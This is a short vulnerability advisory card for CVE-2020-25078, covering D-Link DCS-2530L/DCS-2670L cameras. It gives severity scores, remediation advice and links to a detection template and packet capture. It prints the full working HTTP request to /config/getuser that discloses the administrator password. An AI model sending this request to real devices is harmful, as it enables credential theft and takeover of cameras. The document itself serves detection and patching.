| Title | D-Link DCS-2530L/DCS-2670L - Administrator Password Disclosure |
|---|---|
| Author | pikpikcu |
| Severity | High |
| Impact | An attacker can obtain the administrator password, potentially leading to unauthorized access and control of the camera. |
| Remediation | Update the camera firmware to the latest version to fix the vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.94229 |
| CVE ID | CVE-2020-25078 |
| Tags | cve cve2020 dlink kev vkev vuln |
D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices are vulnerable to password disclosures vulnerabilities because the /config/getuser endpoint allows for remote administrator password disclosure.
GET /config/getuser?index=0 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/620.32 (KHTML, like Gecko) Version/17.1.10 Safari/620.32
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-25078.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-25078.pcap
N/AN/A